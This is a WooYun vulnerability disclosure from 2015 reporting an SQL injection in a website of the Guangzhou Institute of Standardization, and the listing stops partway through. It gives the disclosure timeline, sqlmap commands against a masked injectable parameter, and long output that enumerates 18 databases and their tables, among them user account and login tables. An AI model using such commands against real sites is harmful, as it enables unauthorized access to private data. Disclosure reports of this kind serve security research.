当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154777

漏洞标题:广州市标准研究院某处注入一枚,泄漏上十万、百万数据,18个库数据泄漏

相关厂商:广州市标准研究院

漏洞作者: IceKing

提交时间:2015-11-26 21:32

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-26: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

RT

详细说明:

数据泄漏上百万
[20:13:57] [INFO] resumed: 98698
[20:13:57] [INFO] resumed: 183205
[20:13:57] [INFO] resumed: 98525
[20:13:57] [INFO] resumed: 674915
[20:13:57] [INFO] resumed: 2843
[20:13:57] [INFO] resumed: 2843
[20:13:57] [INFO] resumed: 6781
[20:13:57] [INFO] resumed: 14720
[20:13:57] [INFO] resumed: 34599
[20:15:24] [INFO] resumed: 24097
[20:15:24] [INFO] resumed: 1072530
[20:15:24] [INFO] resumed: 90426
[20:15:24] [INFO] resumed: 1074079
[20:15:24] [INFO] resumed: 1074450
[20:15:24] [INFO] resumed: 207466
[20:15:24] [INFO] resumed: 16993
[20:15:24] [INFO] resumed: 5755
[20:15:24] [INFO] resumed: 2954
[20:15:24] [INFO] resumed: 11597
[20:15:25] [INFO] resumed: 3832
[20:15:25] [INFO] resumed: 3916
[20:15:25] [INFO] resumed: 13194
[20:15:25] [INFO] resumed: 3800
[20:15:25] [INFO] resumed: 3916
[20:15:25] [INFO] resumed: 8085
[20:15:25] [INFO] resumed: 1838
[20:15:25] [INFO] resumed: 16999
[20:15:25] [INFO] resumed: 3211
[20:15:25] [INFO] resumed: 18874
<code>sqlmap.py -u "http://**.**.**.**/cb/QS_detail.asp?iAutoID=261" --dbs
available databases [18]:
[*] BZ
[*] BZClient
[*] DLog
[*] eLibrary
[*] eLibraryClient
[*] eLibraryNew
[*] ESAdmin2002Lib
[*] ESFood
[*] GZlitareturedb
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] temp
[*] tempdb
[*] tempGot
[*] tuser
sqlmap.py -u "http://**.**.**.**/cb/QS_detail.asp?iAutoID=261" --tables
Database: tuser
[15 tables]
+--------------------------------------------------+
| dbo.Criter_f |
| dbo.Criter_n |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.tUserAccount |
| dbo.tUserlook |
| dbo.tUserorder |
| dbo.tlookscan |
| dbo.tlookscan_del |
| dbo.tlookscan_new |
| dbo.torderscan |
| dbo.torderscan_del |
| dbo.torderscan_new |
| dbo.tuser_c |
+--------------------------------------------------+
Database: pubs
[14 tables]
+--------------------------------------------------+
| dbo.authors |
| dbo.discounts |
| dbo.employee |
| dbo.jobs |
| dbo.pub_info |
| dbo.publishers |
| dbo.roysched |
| dbo.sales |
| dbo.stores |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.titleauthor |
| dbo.titles |
| dbo.titleview |
+--------------------------------------------------+
Database: Northwind
[31 tables]
+--------------------------------------------------+
| dbo.Categories |
| dbo.CustomerCustomerDemo |
| dbo.CustomerDemographics |
| dbo.Customers |
| dbo.EmployeeTerritories |
| dbo.Employees |
| dbo.Invoices |
| dbo.Orders |
| dbo.Products |
| dbo.Region |
| dbo.Shippers |
| dbo.Suppliers |
| dbo.Territories |
| dbo.[Alphabetical list of products] |
| dbo.[Category Sales for 1997] |
| dbo.[Current Product List] |
| dbo.[Customer and Suppliers by City] |
| dbo.[Order Details Extended] |
| dbo.[Order Details] |
| dbo.[Order Subtotals] |
| dbo.[Orders Qry] |
| dbo.[Product Sales for 1997] |
| dbo.[Products Above Average Price] |
| dbo.[Products by Category] |
| dbo.[Quarterly Orders] |
| dbo.[Sales Totals by Amount] |
| dbo.[Sales by Category] |
| dbo.[Summary of Sales by Quarter] |
| dbo.[Summary of Sales by Year] |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+
Database: eLibraryClient
[81 tables]
+--------------------------------------------------+
| [dbo CallBoard] |
| [dbo(dtproperties] |
| [dbo,EmployeSub3] |
| [dbo-EmployeV] |
| dbo.AdmFunction |
| dbo.AdmGLinkF |
| dbo.AdmGroup |
| dbo.AdmOrgan |
| dbo.AdmPLinkF |
| dbo.AdmPLinkG |
| dbo.AdmPLinkO |
| dbo.AdmPLinkOa |
| dbo.AdmPLogin |
| dbo.AdmPerson |
| dbo.AdmSystem |
| dbo.BTab009 |
| dbo.BTab015 |
| dbo.BTab103 |
| dbo.BTab401 |
| dbo.BTab402 |
| dbo.BTab403 |
| dbo.BTabMain |
| dbo.BTable_tmp |
| dbo.BZ_PDF |
| dbo.BZ_PDF_Custom |
| dbo.BZ_top_cache |
| dbo.BookDetail |
| dbo.BookHistory |
| dbo.BookHistoryV |
| dbo.BookSub |
| dbo.BookSubV |
| dbo.Book_Main |
| dbo.Book_MainV |
| dbo.CB2_File |
| dbo.CallBoard2 |
| dbo.CallBoard2_Child |
| dbo.CriterV |
| dbo.Criter_Info |
| dbo.Criter_uploadLog_H |
| dbo.Criter_uploadLog_child |
| dbo.ESCOMCounter |
| dbo.ESComRegist |
| dbo.ESComRegist_Log |
| dbo.ESEditMark |
| dbo.Employe |
| dbo.EmployeSub1 |
| dbo.EmployeSub2 |
| dbo.GetMaxBarMain |
| dbo.GetMaxID |
| dbo.ICS_chinaType |
| dbo.ICStree_0 |
| dbo.ICStree_1 |
| dbo.INetLogV |
| dbo.ImPleMentDateV |
| dbo.Industry |
| dbo.ListSet |
| dbo.OperatorReg |
| dbo.OperatorRegV |
| dbo.PrintCriter |
| dbo.PrintCriterV |
| dbo.TMark |
| dbo.Tree201 |
| dbo.Tree401 |
| dbo.Tree402 |
| dbo.Tree403 |
| dbo.TreeMain |
| dbo.WebSite_Log |
| dbo.WebSite_LogV |
| dbo.[BTab01.] |
| dbo.[BTab02.] |
| dbo.[BTab40.] |
| dbo.[Tree20.] |
| dbo.[Tree40.] |
| dbo.sy@seg@ents |
| dbo.sysconstraints |
| dbo.tUserAccount |
| dbo.tUserAccountV |
| dbo.tUserOrder |
| dbo.tUserRegister |
| dbo.tUserRegister_cCode |
| dbo.tUserRegister_child |
+--------------------------------------------------+
Database: temp
[29 tables]
+--------------------------------------------------+
| dbo.AdmFunction |
| dbo.AdmGLinkF |
| dbo.AdmGroup |
| dbo.AdmOrgan |
| dbo.AdmPLinkF |
| dbo.AdmPLinkG |
| dbo.AdmPLinkO |
| dbo.AdmPLinkOa |
| dbo.AdmPLogin |
| dbo.AdmPerson |
| dbo.AdmSystem |
| dbo.BTable |
| dbo.BTable_tmp |
| dbo.CallBoard |
| dbo.Criter |
| dbo.Criter_Food |
| dbo.Criter_FoodV |
| dbo.Criter_Food_Tree |
| dbo.Criter_Food_ref |
| dbo.ESCOMTree351 |
| dbo.ESCOMTree602 |
| dbo.ESCOMUnit351 |
| dbo.ESCOMUnit351_Tree |
| dbo.ESCOMUnit602 |
| dbo.ESCOMUnit602_Tree |
| dbo.ReplceCriter |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+
Database: GZlitareturedb
[171 tables]
+--------------------------------------------------+
| [dbo CriterCue] |
| [dbo TSysRPermit] |
| [dbo(EpBase] |
| [dbo(UserTab] |
| [dbo,GB2008] |
| [dbo,V_Criter] |
| [dbo-HB2008] |
| [dbo-V_CriterInfo_Cy] |
| dbo.BackCode |
| dbo.BackCriter_CriterQ |
| dbo.BuyCriter |
| dbo.CN_N |
| dbo.CN_O |
| dbo.CN_QT_O |
| dbo.CNumberQ |
| dbo.CountMoney |
| dbo.Criter |
| dbo.CriterInfo |
| dbo.CriterON |
| dbo.CriterQ |
| dbo.CriterType |
| dbo.Criter_Back1 |
| dbo.DefaultMoney |
| dbo.Epbase_ProDuctQ |
| dbo.Epbase_ProDuct_UseCriteQ |
| dbo.FindCriListQ |
| dbo.HY_152 |
| dbo.ICS |
| dbo.IncludeFile |
| dbo.InputLog |
| dbo.Ken_Criter |
| dbo.Ken_RZ |
| dbo.LeavMoney |
| dbo.Me@ber@riter@nfo |
| dbo.Member |
| dbo.Member1 |
| dbo.MemberCriter |
| dbo.MemberCriterQ |
| dbo.MemberCriter_CriterQ |
| dbo.MemberCriter_TotalMoney |
| dbo.Member_BuyCriter |
| dbo.Member_SaveMoney |
| dbo.MenuTab |
| dbo.MothTotalQ |
| dbo.ProCriter |
| dbo.ProDuct |
| dbo.ProState |
| dbo.ProUseCriter |
| dbo.ProViderandsavemoneyQ |
| dbo.ProtCriter |
| dbo.ProtEpName |
| dbo.ProtEpName_CriterQ |
| dbo.Provider |
| dbo.Provider2 |
| dbo.ProviderAndleavMoneyQ |
| dbo.ProviderandbuycriterQ |
| dbo.QCriterion |
| dbo.QT_N |
| dbo.Read_ToTalMoney |
| dbo.ReaderCriter |
| dbo.ReaderCriterQ |
| dbo.Reader_BuyCriter |
| dbo.ReplceCriter |
| dbo.RidhtTab |
| dbo.SaveMoney |
| dbo.SpendMoneyQ |
| dbo.StdRegNo |
| dbo.TPDFxx |
| dbo.TQybab |
| dbo.TSysPermit |
| dbo.TSysRoleInfo |
| dbo.TSysUsers |
| dbo.TableFiled |
| dbo.TableName |
| dbo.TableStru |
| dbo.Tbmxx |
| dbo.Tbpgxmp |
| dbo.Tbzckjr |
| dbo.Tbzgxmb |
| dbo.Tbzwbdjm |
| dbo.Thfjfmx |
| dbo.Tqybzsl |
| dbo.Tqybzszb |
| dbo.Tydfw |
| dbo.Tydhy |
| dbo.Tzt |
| dbo.UseMoney |
| dbo.VIEW1 |
| dbo.VIEW2 |
| dbo.VMemberCriter |
| dbo.VReaderCriter |
| dbo.VSaveMoney |
| dbo.VSaveMoneyQ |
| dbo.V_Bzckjr |
| dbo.V_Bzwbjm |
| dbo.V_CriState |
| dbo.V_FindCriterCue |
| dbo.V_ICS_China_Type |
| dbo.V_Member |
| dbo.V_NewCriInfor |
| dbo.V_ProEpCr |
| dbo.V_ReCri |
| dbo.V_ReaderCriter_Cy |
| dbo.V_Reader_CriterQ |
| dbo.V_Reader_CriterQ_MoreCheckNew |
| dbo.V_TCriterCueCriterCriterType |
| dbo.V_TSysUsers |
| dbo.WorkDay |
| dbo.[Re`der_Crite`Q] |
| dbo.[TSysPermit20.50610] |
| dbo.[qt\c_o\] |
| dbo._del_Member |
| dbo.bzwb |
| dbo.c_1 |
| dbo.c_2 |
| dbo.c_3 |
| dbo.classbuild |
| **.**.**.**_201503_criter_new |
| **.**.**.**_201503_criter_old_f |
| **.**.**.**_c_n |
| **.**.**.**_c_n_ |
| **.**.**.**_c_o |
| **.**.**.**_c_o_ |
| dbo.criter_03 |
| dbo.criter_aaa |
| dbo.criter_new |
| dbo.criter_old |
| dbo.criter_rl |
| dbo.criter_totle |
| dbo.criterbak1 |
| dbo.criterbak2 |
| dbo.criterbak3 |
| dbo.criterbak4 |
| dbo.dbj_2 |
| dbo.dtproperties |
| dbo.implementdate_check |
| dbo.llp |
| dbo.member_LeavMoney |
| dbo.member_LeavMoneyInfo |
| dbo.new |
| dbo.old |
| dbo.old_0924 |
| dbo.old_2 |
| dbo.old_3 |
| dbo.old_new |
| dbo.qtX201503_criter_old_f |
| dbo.qt_201503_criter_new |
| dbo.qt_c_n |
| dbo.qt_c_n_ |
| dbo.qt_c_o |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.temp_criter |
| dbo.temp_file |
| dbo.temp_issueyear |
| dbo.temp_pdf |
| dbo.temp_pdf_needtocopy |
| dbo.temp_pdf_notincriter |
| dbo.temp_tif |
| dbo.temp_tifnotscan |
| dbo.temp_xjs |
| dbo.temp_xjs1 |
| dbo.update_1 |
| dbo.update_2 |
| dbo.vBuyCriter |
| dbo.v_Tbzgxmx |
| dbo.v_Temp_Thfjfmx |
| dbo.v_Temp_Thfjfmx_tmp |
| dbo.v_Thfjfmx |
| dbo.v_Thfjfmx_hf |
| dbo.zfdb |
+--------------------------------------------------+
Database: eLibrary
[104 tables]
+--------------------------------------------------+
| [dbo BZ_PDF] |
| [dbo(Criter_censorV] |
| [dbo,Criter_set_censor] |
| [dbo-Criter_uploadLog_child] |
| dbo.AdmFunction |
| dbo.AdmGLinkF |
| dbo.AdmGroup |
| dbo.AdmOrgan |
| dbo.AdmPLinkF |
| dbo.AdmPLinkG |
| dbo.AdmPLinkO |
| dbo.AdmPLinkOa |
| dbo.AdmPLogin |
| dbo.AdmPerson |
| dbo.AdmSystem |
| dbo.BTab009 |
| dbo.BTab015 |
| dbo.BTab103 |
| dbo.BTab401 |
| dbo.BTab402 |
| dbo.BTab403 |
| dbo.BTabMain |
| dbo.BTable |
| dbo.BTable_tmp |
| dbo.BZ_PDF_Custom |
| dbo.BZ_PDF_Plan |
| dbo.BZ_top_cache |
| dbo.BookDetail |
| dbo.BookDetailV |
| dbo.BookHistory |
| dbo.BookHistoryV |
| dbo.BookSub |
| dbo.BookSubV |
| dbo.Book_Main |
| dbo.Book_MainV |
| dbo.CB2_File |
| dbo.CallBoard |
| dbo.CallBoard2 |
| dbo.CallBoard2_Child |
| dbo.CriterV |
| dbo.Criter_Info |
| dbo.Criter_oldCriter |
| dbo.Criter_oldCriter_split |
| dbo.Criter_uploadLog_H |
| dbo.ESCOMCounter |
| dbo.ESCOMTree602 |
| dbo.ESCOMUnit602 |
| dbo.ESCOMUnit602_Tree |
| dbo.ESComRegist |
| dbo.ESComRegist_Log |
| dbo.ESEditMark |
| dbo.ESgb2760 |
| dbo.Employe |
| dbo.EmployeSub1 |
| dbo.EmployeSub2 |
| dbo.EmployeSub3 |
| dbo.EmployeV |
| dbo.Ge@Max@D |
| dbo.GetMaxBarMain |
| dbo.ICS_chinaType |
| dbo.ICStree_0 |
| dbo.ICStree_1 |
| dbo.INetLogV |
| dbo.ImPleMentDateV |
| dbo.ListSet |
| dbo.OperatorReg |
| dbo.OperatorRegV |
| dbo.PrintCriter |
| dbo.PrintCriterV |
| dbo.TMark |
| dbo.Tree201 |
| dbo.Tree401 |
| dbo.Tree402 |
| dbo.Tree403 |
| dbo.TreeMain |
| dbo.WebSite_Log |
| dbo.WebSite_LogV |
| dbo.[BTab01.] |
| dbo.[BTab02.] |
| dbo.[BTab40.] |
| dbo.[Tree20.] |
| dbo.[Tree40.] |
| dbo.[tU`erO`derV] |
| dbo.aa |
| dbo.dtproperties |
| dbo.gb2760 |
| dbo.iapps |
| dbo.pangolin_test_table |
| dbo.sqlmapoutput |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.tUserAccount |
| dbo.tUserAccountV |
| dbo.tUserAccount_Total |
| dbo.tUserAccount_Total2 |
| dbo.tUserAccount_Total3 |
| dbo.tUserOrder |
| dbo.tUserOrder_downloadCount |
| dbo.tUserOrder_updateCriter |
| dbo.tUserRegister |
| dbo.tUserRegister_cCode |
| dbo.tUserRegister_child |
| dbo.u_c |
| dbo.use1 |
+--------------------------------------------------+
Database: tempdb
[2 tables]
+--------------------------------------------------+
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+
Database: ESFood
[38 tables]
+--------------------------------------------------+
| [dbo GB 760] |
| dbo.AdmFunction |
| dbo.AdmGLinkF |
| dbo.AdmGroup |
| dbo.AdmOrgan |
| dbo.AdmPLinkF |
| dbo.AdmPLinkG |
| dbo.AdmPLinkO |
| dbo.AdmPLinkOa |
| dbo.AdmPLogin |
| dbo.AdmPerson |
| dbo.AdmSystem |
| dbo.BTable |
| dbo.BTable_tmp |
| dbo.CB2_File |
| dbo.CallBoard |
| dbo.CallBoard2 |
| dbo.CallBoard2_Child |
| dbo.CriterV |
| dbo.Criter_Food |
| dbo.Criter_FoodV |
| dbo.Criter_Food_Tree |
| dbo.Criter_Food_ref |
| dbo.Criter_food_joinV |
| dbo.Criter_food_treeV |
| dbo.ESCOMTree351 |
| dbo.ESCOMTree602 |
| dbo.ESCOMUnit351 |
| dbo.ESCOMUnit351_Tree |
| dbo.ESCOMUnit602 |
| dbo.ESCOMUnit602_Tree |
| dbo.ESCOMtree351V |
| dbo.GB2760V |
| dbo.GB2760_Tree |
| dbo.GB2760_Type |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+
Database: ESAdmin2002Lib
[14 tables]
+--------------------------------------------------+
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.tFunction |
| dbo.tGLinkF |
| dbo.tGroup |
| dbo.tLog |
| dbo.tOrgan |
| dbo.tPLinkF |
| dbo.tPLinkG |
| dbo.tPLinkO |
| dbo.tPLogin |
| dbo.tPerson |
| dbo.tSystem |
+--------------------------------------------------+
Database: master
[36 tables]
+--------------------------------------------------+
| dbo.MSreplication_options |
| dbo.[INFORMATION_SCHEMA.CHECK_CONSTRAINTS] |
| dbo.[INFORMATION_SCHEMA.COLUMNS] |
| dbo.[INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE] |
| dbo.[INFORMATION_SCHEMA.COLUMN_PRIVILEGES] |
| dbo.[INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE] |
| dbo.[INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE] |
| dbo.[INFORMATION_SCHEMA.DOMAINS] |
| dbo.[INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS] |
| dbo.[INFORMATION_SCHEMA.KEY_COLUMN_USAGE] |
| dbo.[INFORMATION_SCHEMA.PARAMETERS] |
| dbo.[INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS] |
| dbo.[INFORMATION_SCHEMA.ROUTINES] |
| dbo.[INFORMATION_SCHEMA.ROUTINE_COLUMNS] |
| dbo.[INFORMATION_SCHEMA.SCHEMATA] |
| dbo.[INFORMATION_SCHEMA.TABLES] |
| dbo.[INFORMATION_SCHEMA.TABLE_CONSTRAINTS] |
| dbo.[INFORMATION_SCHEMA.TABLE_PRIVILEGES] |
| dbo.[INFORMATION_SCHEMA.VIEWS] |
| dbo.[INFORMATION_SCHEMA.VIEW_COLUMN_USAGE] |
| dbo.[INFORMATION_SCHEMA.VIEW_TABLE_USAGE] |
| dbo.spt_datatype_info |
| dbo.spt_datatype_info_ext |
| dbo.spt_fallback_db |
| dbo.spt_fallback_dev |
| dbo.spt_fallback_usg |
| dbo.spt_monitor |
| dbo.spt_provider_types |
| dbo.spt_server_info |
| dbo.spt_values |
| dbo.sysconstraints |
| dbo.syslogins |
| dbo.sysoledbusers |
| dbo.sysopentapes |
| dbo.sysremotelogins |
| dbo.syssegments |
+--------------------------------------------------+
Database: DLog
[5 tables]
+--------------------------------------------------+
| dbo.INetLog |
| dbo.INetLogH |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+
Database: tempGot
[135 tables]
+--------------------------------------------------+
| [dbo VSaveMoney] |
| [dbo llp] |
| [dbo(MemberCriter_CriterQ] |
| [dbo,MenuTab] |
| [dbo-MothTotalQ] |
| dbo.BZ10069 |
| dbo.BZ_PDF |
| dbo.BackCode |
| dbo.BackCriter_CriterQ |
| dbo.BuyCriter |
| dbo.CNumberQ |
| dbo.CountMoney |
| dbo.Criter |
| dbo.CriterCue |
| dbo.CriterInfo |
| dbo.CriterON |
| dbo.CriterQ |
| dbo.CriterType |
| dbo.Criter_ |
| dbo.Criter_Back1 |
| dbo.DefaultMoney |
| dbo.EpBase |
| dbo.Epbase_ProDuctQ |
| dbo.Epbase_ProDuct_UseCriteQ |
| dbo.FindCriListQ |
| dbo.ICS |
| dbo.IncludeFile |
| dbo.InputLog |
| dbo.Ken_Criter |
| dbo.Ken_RZ |
| dbo.LeavMoney |
| dbo.Member |
| dbo.Member1 |
| dbo.MemberCriter |
| dbo.MemberCriterInfo |
| dbo.MemberCriterQ |
| dbo.MemberCriter_TotalMoney |
| dbo.Member_BuyCriter |
| dbo.Member_SaveMoney |
| dbo.Org |
| dbo.ProCriter |
| dbo.ProDuct |
| dbo.ProState |
| dbo.ProUseCriter |
| dbo.ProViderandsavemoneyQ |
| dbo.ProtCriter |
| dbo.ProtEpName |
| dbo.ProtEpName_CriterQ |
| dbo.Provider |
| dbo.Provider2 |
| dbo.ProviderAndleavMoneyQ |
| dbo.ProviderandbuycriterQ |
| dbo.QCriterion |
| dbo.Re@der@riter |
| dbo.Read_ToTalMoney |
| dbo.ReaderCriterQ |
| dbo.Reader_BuyCriter |
| dbo.Reader_CriterQ |
| dbo.ReplceBriter |
| dbo.RightTab |
| dbo.SaveMoney |
| dbo.SpendMoneyQ |
| dbo.StdRegNo |
| dbo.TPDFxx |
| dbo.TQybab |
| dbo.TSysRPermit |
| dbo.TSysRoleInfo |
| dbo.TSysUsdrs |
| dbo.TableFiled |
| dbo.TableName |
| dbo.TableStru |
| dbo.Tbmxx |
| dbo.Tbzckjr |
| dbo.Tbzgxmb |
| dbo.Tbzgxmx |
| dbo.Tbzwbdjm |
| dbo.Thfjfmx |
| dbo.Tqybzsl |
| dbo.Tqybzszb |
| dbo.Tydfw |
| dbo.Tydhy |
| dbo.Tzt |
| dbo.UseMoney |
| dbo.UserTab |
| dbo.VIEW1 |
| dbo.VIEW2 |
| dbo.VMemberCriter |
| dbo.VReaderCriter |
| dbo.VSaueMoneyQ |
| dbo.V_Bzckjr |
| dbo.V_Bzwbjm |
| dbo.V_CriState |
| dbo.V_Criter |
| dbo.V_CriterInfo_Cy |
| dbo.V_FindCriterCue |
| dbo.V_ICS_China_Type |
| dbo.V_Member |
| dbo.V_NewCriInfor |
| dbo.V_ProEpCr |
| dbo.V_ReCri |
| dbo.V_ReaderCriter_Cy |
| dbo.V_Reader_CriterQ |
| dbo.V_Reader_CriterQ_MoreCheckNew |
| dbo.V_TCriterCueCriterCriterType |
| dbo.V_TSysUsers |
| dbo.WorkDay |
| dbo.[BZ1241.] |
| dbo.[TS`sPe`mit] |
| dbo.[TSysPermit20.50610] |
| dbo._del_Member |
| dbo.bzwb |
| dbo.classbuild |
| dbo.dtproperties |
| dbo.implementdate_check |
| dbo.member_LeavMoney |
| dbo.member_LeavMoneyInfo |
| dbo.productCode |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.temp_criter |
| dbo.temp_file |
| dbo.temp_issueyear |
| dbo.temp_pdf |
| dbo.temp_pdf_needtocopy |
| dbo.temp_pdf_notincriter |
| dbo.temp_tif |
| dbo.temp_tifnotscan |
| dbo.temp_xjs |
| dbo.temp_xjs1 |
| dbo.vBuyCriter |
| dbo.v_Tbzgxmx |
| dbo.v_Temp_Thfjfmx |
| dbo.v_Temp_Thfjfmx_tmp |
| dbo.v_Thfjfmx |
| dbo.v_Thfjfmx_hf |
+--------------------------------------------------+
Database: msdb
[77 tables]
+--------------------------------------------------+
| [dbo RTblRelshipProps] |
| [dbo(RTblTypeLibs] |
| [dbo,RTblVersions] |
| [dbo-RTblWorkspaceItems] |
| dbo.RTblClassDefs |
| dbo.RTblDBMProps |
| dbo.RTblDBXProps |
| dbo.RTblDTMProps |
| dbo.RTblDTSProps |
| dbo.RTblDatabaseVersion |
| dbo.RTblEQMProps |
| dbo.RTblEnumerationDef |
| dbo.RTblEnumerationValueDef |
| dbo.RTblGENProps |
| dbo.RTblIfaceDefs |
| dbo.RTblIfaceHier |
| dbo.RTblIfaceMem |
| dbo.RTblMDSProps |
| dbo.RTblNamedObj |
| dbo.RTblOLPProps |
| dbo.RTblParameterDef |
| dbo.RTblPropDefs |
| dbo.RTblProps |
| dbo.RTblRelColDefs |
| dbo.RTblRelshipDefs |
| dbo.RTblRelships |
| dbo.RTblSIMProps |
| dbo.RTblScriptDefs |
| dbo.RTblSites |
| dbo.RTblSumInfo |
| dbo.RTblTFMProps |
| dbo.RTblTypeInfo |
| dbo.RTblUMLProps |
| dbo.RTblUMXProps |
| dbo.RTblVersionAdminInfo |
| dbo.backupfile |
| dbo.backupmediafamily |
| dbo.backupmediaset |
| dbo.backupset |
| dbo.log_shipping_primaries |
| dbo.log_shipping_secondaries |
| dbo.logmarkhistory |
| dbo.mswebtasks |
| dbo.restorefile |
| dbo.restorefilegroup |
| dbo.restorehistory |
| dbo.sqlagent_info |
| dbo.sy@job@chedu@es |
| dbo.sysalerts |
| dbo.syscachedcredentials |
| dbo.syscategories |
| dbo.sysconstraints |
| dbo.sysdbmaintplan_databases |
| dbo.sysdbmaintplan_history |
| dbo.sysdbmaintplan_jobs |
| dbo.sysdbmaintplans |
| dbo.sysdownloadlist |
| dbo.sysdtscategories |
| dbo.sysdtspackagelog |
| dbo.sysdtspackages |
| dbo.sysdtssteplog |
| dbo.sysdtstasklog |
| dbo.sysjobhistory |
| dbo.sysjobs |
| dbo.sysjobs_view |
| dbo.sysjobservers |
| dbo.sysjobsteps |
| dbo.sysnotifications |
| dbo.sysoperators |
| dbo.syssegments |
| dbo.systargetservergroupmembers |
| dbo.systargetservergroups |
| dbo.systargetservers |
| dbo.systargetservers_view |
| dbo.systaskids |
| dbo.systasks |
| dbo.systasks_view |
+--------------------------------------------------+
Database: BZClient
[5 tables]
+--------------------------------------------------+
| dbo.Criter |
| dbo.ICS |
| dbo.productCode |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+
Database: model
[2 tables]
+--------------------------------------------------+
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+
Database: BZ
[12 tables]
+--------------------------------------------------+
| dbo.Criter |
| dbo.ICS |
| dbo.ansi |
| dbo.bs |
| dbo.din |
| dbo.dtproperties |
| dbo.en |
| dbo.iso |
| dbo.nf |
| dbo.productCode |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+
Database: eLibraryNew
[142 tables]
+--------------------------------------------------+
| [dbo BZ_PDF] |
| [dbo USA_CFR_ProductCode] |
| [dbo(CB2_File] |
| [dbo(??????] |
| [dbo,Criter_Package_list] |
| [dbo-Criter_PackageV] |
| dbo.AdmFunction |
| dbo.AdmGLinkF |
| dbo.AdmGroup |
| dbo.AdmOrgan |
| dbo.AdmPLinkF |
| dbo.AdmPLinkG |
| dbo.AdmPLinkO |
| dbo.AdmPLinkOa |
| dbo.AdmPLogin |
| dbo.AdmPerson |
| dbo.AdmSystem |
| dbo.BTab009 |
| dbo.BTab015 |
| dbo.BTab103 |
| dbo.BTab401 |
| dbo.BTab402 |
| dbo.BTab403 |
| dbo.BTabMain |
| dbo.BTable_tmp |
| dbo.BZ_PDF_Custom |
| dbo.BZ_PDF_Plan |
| dbo.BZ_top_cache |
| dbo.BookDetail |
| dbo.BookDetailV |
| dbo.BookHistory |
| dbo.BookHistoryV |
| dbo.BookSub |
| dbo.BookSubV |
| dbo.Book_Main |
| dbo.Book_MainV |
| dbo.CAC |
| dbo.CallBoard |
| dbo.CallBoard2 |
| dbo.CallBoard2_Child |
| dbo.CriterV |
| dbo.CriterV3 |
| dbo.Criter_Info |
| dbo.Criter_Package |
| dbo.Criter_Publisher |
| dbo.Criter_censorV |
| dbo.Criter_productCode |
| dbo.Criter_productCode_ |
| dbo.Criter_set_censor |
| dbo.Criter_uploadLog_H |
| dbo.Criter_uploadLog_child |
| dbo.ES@omR@gist |
| dbo.ESBOMTree602 |
| dbo.ESCOMCounter |
| dbo.ESCOMUnit602 |
| dbo.ESCOMUnit602_Tree |
| dbo.ESComRegist_Log |
| dbo.ESEditMark |
| dbo.EUR_lex |
| dbo.EUR_lexV |
| dbo.EUR_lex_productCode |
| dbo.EUR_title |
| dbo.EU_2 |
| dbo.EU_25T |
| dbo.EU_TRAND |
| dbo.Elig_ASS |
| dbo.Elig_ASS_productCode |
| dbo.Elig_Mode |
| dbo.Employe |
| dbo.EmployeSub1 |
| dbo.EmployeSub2 |
| dbo.EmployeSub3 |
| dbo.EmployeV |
| dbo.Eu_26T |
| dbo.Eur_25 |
| dbo.GetMaxBarMain |
| dbo.GetMaxID |
| dbo.ICR_chinaType |
| dbo.ICStree_0 |
| dbo.ICStree_1 |
| dbo.INetLogV |
| dbo.ImPleMentDateV |
| dbo.Industry |
| dbo.Japan_FG |
| dbo.Japan_FGV |
| dbo.Japan_FG_productCode |
| dbo.Japan_FG_type |
| dbo.Japan_PLS |
| dbo.Japan_PLS_productCode |
| dbo.Japan_product |
| dbo.ListSet |
| dbo.OperatorRegV |
| dbo.Or |
| dbo.Org |
| dbo.Part_en |
| dbo.PrintCriter |
| dbo.PrintCriterV |
| dbo.Sheet1 |
| dbo.TBT1 |
| dbo.TBT_SPS |
| dbo.TBT_SPS_productCode |
| dbo.TBT_Warning |
| dbo.TMark |
| dbo.Tree201 |
| dbo.Tree401 |
| dbo.Tree402 |
| dbo.Tree403 |
| dbo.TreeMain |
| dbo.USA_CFR |
| dbo.USA_CFRV |
| dbo.USA_TRAND |
| dbo.USA_partName |
| dbo.USA_title |
| dbo.WebSite_Log |
| dbo.WebSite_LogV |
| dbo.[BTab01.] |
| dbo.[BTab02.] |
| dbo.[BTab40.] |
| dbo.[Eur_20.70123] |
| dbo.[Op`rat`rReg] |
| dbo.[Tree20.] |
| dbo.[Tree40.] |
| dbo.[????] |
| dbo._USA_CFR |
| dbo.aaa |
| dbo.dtproperties |
| dbo.prhductCodeV_javascript |
| dbo.productCode |
| dbo.student |
| dbo.sysconstraints |
| dbo.sysseglents |
| dbo.tUserAccount |
| dbo.tUserAccountV |
| dbo.tUserOrder |
| dbo.tUserOrderV |
